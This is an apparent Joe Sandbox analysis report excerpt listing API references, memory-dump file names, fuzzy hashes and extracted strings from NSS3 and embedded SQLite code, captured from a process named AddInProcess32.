                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CCFDECE
                                                                                      • PR_DestroyLock.NSS3(00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CCFDEDE
                                                                                      • PK11_FreeSlot.NSS3(?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CCFDEE8
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CCFDEF5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeUtil$Free_K11_$DestroyItem_LockSlot
                                                                                      • String ID:
                                                                                      • API String ID: 41621619-0
                                                                                      • Opcode ID: 1684a75306bde5dd16f6f40896802ece50ceab90374c21fc3a8f5be0b0706e69
                                                                                      • Instruction ID: b8a5530b05e2c6250c5046d497d7858b1b7f84e2be467f15bb38d9f45a43684c
                                                                                      • Opcode Fuzzy Hash: 1684a75306bde5dd16f6f40896802ece50ceab90374c21fc3a8f5be0b0706e69
                                                                                      • Instruction Fuzzy Hash: E9018F32105701AFDB366F11E804B86B7F5EF10728F20882DE4AA45DB0EB76E489CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: <
                                                                                      • API String ID: 0-4251816714
                                                                                      • Opcode ID: 6cc5ce0468ba57804906a1e3e0ee5c73edbad02eade8d2b91ca097155b4403bb
                                                                                      • Instruction ID: 9d1e7515c90c5ebb5e065d6da908726a886bebe3bc3ec013cd7071550d967881
                                                                                      • Opcode Fuzzy Hash: 6cc5ce0468ba57804906a1e3e0ee5c73edbad02eade8d2b91ca097155b4403bb
                                                                                      • Instruction Fuzzy Hash: 2AA1E771955A088BDB10CF6DC4806ADBBF1AB09315F22461BE6A1D7E99F330F882DF15
                                                                                      APIs
                                                                                      • PR_NewLock.NSS3(00000000,6CCEE2ED), ref: 6CCDEECE
                                                                                      • PR_NewLock.NSS3(00000000,6CCEE2ED), ref: 6CCDEEE7
                                                                                      • PR_DestroyLock.NSS3 ref: 6CCDEEF8
                                                                                      • PR_NewLock.NSS3(00000000,6CCEE2ED), ref: 6CCDEF11
                                                                                      • PR_DestroyLock.NSS3 ref: 6CCDEF28
                                                                                      • PR_DestroyLock.NSS3 ref: 6CCDEF30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$Destroy
                                                                                      • String ID:
                                                                                      • API String ID: 986837727-0
                                                                                      • Opcode ID: 65efd7dc9f78f1d37938c679b74fe7fa55cc89b7d194d13c316808e842777907
                                                                                      • Instruction ID: aa4a6c2bf3e7e714f9c889cec920ef64e2263a2491b797170d20bb33deddf135
                                                                                      • Opcode Fuzzy Hash: 65efd7dc9f78f1d37938c679b74fe7fa55cc89b7d194d13c316808e842777907
                                                                                      • Instruction Fuzzy Hash: B1012C31A2A217CFFF219B26DC44B46BABCE70333AF56426AD361914A4F7706480CF95
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unlock$CallCondError_LockOnceUtilWait
                                                                                      • String ID:
                                                                                      • API String ID: 1738423461-0
                                                                                      • Opcode ID: bb3b327fa5c53620fb18dd0b69cf838066f93ec2219a6cb6a442cd9667969f18
                                                                                      • Instruction ID: 35930999ce9a79db974b1362ff5ba04ebc30093e85ad464b7650c140c74fc30a
                                                                                      • Opcode Fuzzy Hash: bb3b327fa5c53620fb18dd0b69cf838066f93ec2219a6cb6a442cd9667969f18
                                                                                      • Instruction Fuzzy Hash: 45F06D3261A121DBFF151B74AC0CA897BB9A75B336B2C021AF352819E0EF314440DA54
                                                                                      Strings
                                                                                      • vtable constructor called recursively: %s, xrefs: 6CCBCE70
                                                                                      • vtable constructor did not declare schema: %s, xrefs: 6CCBCFA3
                                                                                      • hidden, xrefs: 6CCBD01A
                                                                                      • vtable constructor failed: %s, xrefs: 6CCBCF32
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                      • API String ID: 2221118986-1299490920
                                                                                      • Opcode ID: ef8604e68e0aab4c3f3157ac9af9593535eaed15f5c75a44d6ad9b3531f6151c
                                                                                      • Instruction ID: 3f050da1e24a623c5e23c216975fb3cc51f23be5750b0babc415f8f0bbfb1dcd
                                                                                      • Opcode Fuzzy Hash: ef8604e68e0aab4c3f3157ac9af9593535eaed15f5c75a44d6ad9b3531f6151c
                                                                                      • Instruction Fuzzy Hash: 2191D071A04206EFDB01CFA9D880AAEBBF1FF48304F144569E805ABB45F731E956CB90
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC689B2
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC68B88
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                      • API String ID: 1477753154-3826999013
                                                                                      • Opcode ID: 56909475388a42a28a20efce969b8622051bc1be713f30a1062f99e9305bec35
                                                                                      • Instruction ID: b8bc441fb444d3b9f3b368dfe88624a2961b63df43456137eb0702e1bb67a5be
                                                                                      • Opcode Fuzzy Hash: 56909475388a42a28a20efce969b8622051bc1be713f30a1062f99e9305bec35
                                                                                      • Instruction Fuzzy Hash: D761D3B1A00706AFEB04CF65CD81EAA77B5FF46318F14456AED009BE81E730E865CB91
                                                                                      APIs
                                                                                      Strings
                                                                                      • name='%q' AND type='table', xrefs: 6CCB4EDD
                                                                                      • CREATE VIRTUAL TABLE %T, xrefs: 6CCB4E6E
                                                                                      • UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d, xrefs: 6CCB4EA1
                                                                                      • sqlite_master, xrefs: 6CCB4E99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID: CREATE VIRTUAL TABLE %T$UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d$name='%q' AND type='table'$sqlite_master
                                                                                      • API String ID: 1622813385-3406100629
                                                                                      • Opcode ID: 6e877ccaa4c1635538e16bf96353121ad499fb5e5f189cbea5c3ad8d2f25ea02
                                                                                      • Instruction ID: 77b4f4d9e33fea12c9dbec4a63a9ae373a2329fc2e3f73a11158fc1a174d731e
                                                                                      • Opcode Fuzzy Hash: 6e877ccaa4c1635538e16bf96353121ad499fb5e5f189cbea5c3ad8d2f25ea02
                                                                                      • Instruction Fuzzy Hash: BF319471505604BFEF029FA5CC84EEB77B9EF45319F104059F90866B10EB32A926DBA1
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(%s_segments,?), ref: 6CC9CF32
                                                                                      • sqlite3_malloc.NSS3(00000014,?,?,00000028,0000002C,00000000,00000000,?,00000000,00000000,?,?), ref: 6CC9CF8B
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,00000028,0000002C,00000000,00000000,?,00000000,00000000,?,?), ref: 6CC9CFD7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_mprintf
                                                                                      • String ID: %s_segments$block
                                                                                      • API String ID: 72814614-4076095781
                                                                                      • Opcode ID: 0586bce9bd97dc479beb53a399f424ed9fa34ee0bdc1126dd2cc80e1dddd3806
                                                                                      • Instruction ID: 59b6b3ad58d0d85c60992861bbd52b62f9df2054ff8bcd95f0c61b922a36f929
                                                                                      • Opcode Fuzzy Hash: 0586bce9bd97dc479beb53a399f424ed9fa34ee0bdc1126dd2cc80e1dddd3806
                                                                                      • Instruction Fuzzy Hash: 7C31D672608706AFEF259F65DD80B977BA5EF08318F10442DFA1A9BE50F7329854CB50
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCD4F44
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD4F88
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD589C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CurrentInitThread
                                                                                      • String ID: %u.%u.%u.%u
                                                                                      • API String ID: 3632930273-1542503432
                                                                                      • Opcode ID: 97227036a046f53ecf4f0287a01ab3c3948ae6aaad18dd3d6c38f873323c5a92
                                                                                      • Instruction ID: b7e79da581b8cf8e4de8b5894b084965811433cf74b7778ff9bd8876e3b57e15
                                                                                      • Opcode Fuzzy Hash: 97227036a046f53ecf4f0287a01ab3c3948ae6aaad18dd3d6c38f873323c5a92
                                                                                      • Instruction Fuzzy Hash: 1C213AB224421879EB105EA99C01FFB3BADEB05738F598155FB188E4D1F722E491D7A0
                                                                                      APIs
                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(00000000,00000000,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 6CD1EAE1
                                                                                        • Part of subcall function 6CD1E667: PL_strncasecmp.NSS3(00000000,?,6CCEE7F7,00000000,6CCEE7F5,00000000), ref: 6CD1E6CF
                                                                                        • Part of subcall function 6CD1E667: NSSUTIL_ArgSkipParameter.NSS3(00000000,00000000,6CCEE7F5,00000000), ref: 6CD1E6DC
                                                                                        • Part of subcall function 6CD1E667: NSSUTIL_ArgStrip.NSS3(00000000,00000000,00000000,6CCEE7F5,00000000), ref: 6CD1E6E2
                                                                                      • PL_strcasecmp.NSS3(00000000,all,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 6CD1EAF7
                                                                                      • PL_strncasecmp.NSS3(00000000,6CD87D08,00000003,6CD1EC36,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 6CD1EB2C
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 6CD1EB66
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: L_strncasecmp$Free_L_strcasecmpParamParameterSkipStripUtilValue
                                                                                      • String ID: all
                                                                                      • API String ID: 3949258030-991457757
                                                                                      • Opcode ID: 65cf33a17c2bf3b122def3dc897e74978b5ca6d1f4b8b6f54fd3e1b08dff94d7
                                                                                      • Instruction ID: 03f6ef0aeb40433c0efa12299c66391493f97d4f19a153286db2cf4bd104f110
                                                                                      • Opcode Fuzzy Hash: 65cf33a17c2bf3b122def3dc897e74978b5ca6d1f4b8b6f54fd3e1b08dff94d7
                                                                                      • Instruction Fuzzy Hash: B1110832A09205FFDB05DF65A98496EBBB5DF85328B11447DE406D3F60E7319E0587A0
                                                                                      APIs
                                                                                      • strrchr.VCRUNTIME140(?,0000005C,?,?,?,6CCCC81B,?), ref: 6CCCC932
                                                                                      • strrchr.VCRUNTIME140(05212240,0000005C,?,?,?,6CCCC81B,?), ref: 6CCCC947
                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,6CCCC81B,?), ref: 6CCCC959
                                                                                      • PR_LogPrint.NSS3(%s incr => %d (find lib),05212240,?,?), ref: 6CCCC98A
                                                                                      Strings
                                                                                      • %s incr => %d (find lib), xrefs: 6CCCC985
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: strrchr$Print_stricmp
                                                                                      • String ID: %s incr => %d (find lib)
                                                                                      • API String ID: 97259331-2309350800
                                                                                      • Opcode ID: 33953c7e00f6e87b7c1a50ad44bd6de4fc62891fb62fae993e7ca40ae3bc4c2b
                                                                                      • Instruction ID: 48ecc70f8ab1e7f381b430866ae76a426a5e605af7cc01ddb6e329ae01c99e7d
                                                                                      • Opcode Fuzzy Hash: 33953c7e00f6e87b7c1a50ad44bd6de4fc62891fb62fae993e7ca40ae3bc4c2b
                                                                                      • Instruction Fuzzy Hash: 2E01A732345602DFFB116B55DC00956B7F8EB47B65710442EE64A979A0EF21E8008B92
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC6ADCD
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC6ADE5
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC6B144
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC6B23A
                                                                                      • sqlite3_mutex_leave.NSS3(00000000,?), ref: 6CC6B24E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 19224710-0
                                                                                      • Opcode ID: 7882156b2b361a32759a7c27fef51010e3f62be617c0a73ba5e8e5032511687d
                                                                                      • Instruction ID: 91a336fb56084243695d3920f786d683b510b2610d5b6b211fda1d2246a47a64
                                                                                      • Opcode Fuzzy Hash: 7882156b2b361a32759a7c27fef51010e3f62be617c0a73ba5e8e5032511687d
                                                                                      • Instruction Fuzzy Hash: ADF1CF71A006159FDB05CF5AC9D1A9EB7F2EF88314F258199E818ABB51FB30ED41CB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID:
                                                                                      • API String ID: 1622813385-0
                                                                                      • Opcode ID: 7010a9c5a3c9993ef16f87bd2bccde9869dd4282a0da50aa5b6d7ce477729479
                                                                                      • Instruction ID: 9b4c7220fd48cdf7adbf30706312e0c8d54555e54bcbf983d8a1e2476168bf65
                                                                                      • Opcode Fuzzy Hash: 7010a9c5a3c9993ef16f87bd2bccde9869dd4282a0da50aa5b6d7ce477729479
                                                                                      • Instruction Fuzzy Hash: F8A1BF71900209BFDF12DF94CC85FEE7BB5EF09318F144049FA04A6690E736DA669BA1
                                                                                      APIs
                                                                                      • sqlite3_free.NSS3(?,00000000,?,00000000,00000000,?,?), ref: 6CC7FCE4
                                                                                      • sqlite3_malloc.NSS3(?,00000000,?,00000000,00000000,?,?), ref: 6CC7FD08
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 6CC7FD24
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpysqlite3_freesqlite3_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 466906664-0
                                                                                      • Opcode ID: a8a20809c15175304deba779bc5decd9e56a7d9e2430619dfb5ad6f45306f1e2
                                                                                      • Instruction ID: 733713bd995da39bc295588b900177970a0a479d2724974b882f71035a0bb700
                                                                                      • Opcode Fuzzy Hash: a8a20809c15175304deba779bc5decd9e56a7d9e2430619dfb5ad6f45306f1e2
                                                                                      • Instruction Fuzzy Hash: 8A7129729047059FD720CF2AC9C0AA6B7F8FF49318B14896DE9968BE41F731E945CB60
                                                                                      APIs
                                                                                      • sqlite3_malloc.NSS3(?,?,?,?,?,?,00000000,?,6CC7E7AD,?,?,6CC8030D,6CC7E7AD,00000000,?,00000001), ref: 6CC7E05B
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • memcpy.VCRUNTIME140(00000001,?,?,5B5E5F00,6CC7E7AD,00000000,?,?,?,?,?,00000000,?,6CC7E7AD), ref: 6CC7E0B5
                                                                                      • sqlite3_realloc.NSS3(89000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CC7E7AD), ref: 6CC7E0DB
                                                                                      • memcpy.VCRUNTIME140(89000001,6CC7E7AD,6CC8030D,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CC7E0FA
                                                                                      • sqlite3_malloc.NSS3(?,00000000,?,6CC7E7AD,?,?,6CC8030D,6CC7E7AD,00000000,?,00000001,?), ref: 6CC7E11E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpysqlite3_malloc$sqlite3_initializesqlite3_realloc
                                                                                      • String ID:
                                                                                      • API String ID: 3891156697-0
                                                                                      • Opcode ID: 018f9e5ef7241acb3c50e463638dd89fe5699042eda718b7968c0fa5fec11c52
                                                                                      • Instruction ID: fbc4cd58a3b522889c61e2a203f0dcd40b1d83a505cc3a9e2a624d75657f1641
                                                                                      • Opcode Fuzzy Hash: 018f9e5ef7241acb3c50e463638dd89fe5699042eda718b7968c0fa5fec11c52
                                                                                      • Instruction Fuzzy Hash: 157107B2E00205EFDF14CF99C981A9A7BB5FF48314F1441A9E808EB751E731EA55CBA1
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,00000000,00000000,00000000,00000000,00000000,6CCE42A3,00000000,00000000,00000001), ref: 6CCF6963
                                                                                        • Part of subcall function 6CCEF761: PR_Lock.NSS3(?,?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF76C
                                                                                        • Part of subcall function 6CCEF761: PL_HashTableLookup.NSS3(?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF778
                                                                                        • Part of subcall function 6CCEF761: PR_Unlock.NSS3(?,?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF782
                                                                                      • PR_Now.NSS3 ref: 6CCF6981
                                                                                      • PR_Unlock.NSS3(?,00000000), ref: 6CCF699B
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCF6B28
                                                                                        • Part of subcall function 6CCEF0BC: PR_Free.NSS3(?,?,00000000,?,00000000,?,?,6CCEFD3D,?,00000000,?,6CCF75DC,00000000,00000000,?,00000000), ref: 6CCEF0E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
